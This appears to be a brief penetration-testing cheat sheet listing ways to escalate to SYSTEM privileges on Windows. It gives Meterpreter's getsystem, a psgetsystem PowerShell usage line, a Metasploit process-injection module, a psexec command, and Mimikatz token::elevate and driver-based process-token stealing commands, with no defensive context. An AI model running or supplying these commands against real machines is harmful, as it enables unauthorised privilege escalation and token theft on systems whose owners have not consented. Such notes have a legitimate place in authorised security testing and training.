System Privileges

Getsystem

getsystem

• https://github.com/decoder-it/psgetsystem

psgetsystem.ps1 <system_PID> <cmd.exe>

Process injection

post/windows/manage/priv_migrate

Psexec

psexec \\127.0.0.1 cmd.exe

Mimikatz

Modify the thread token

token::elevate

Modify the process token

+!
!processToken /from:<PID such as 0. It takes the token from the PID> /to:<PID to give the token>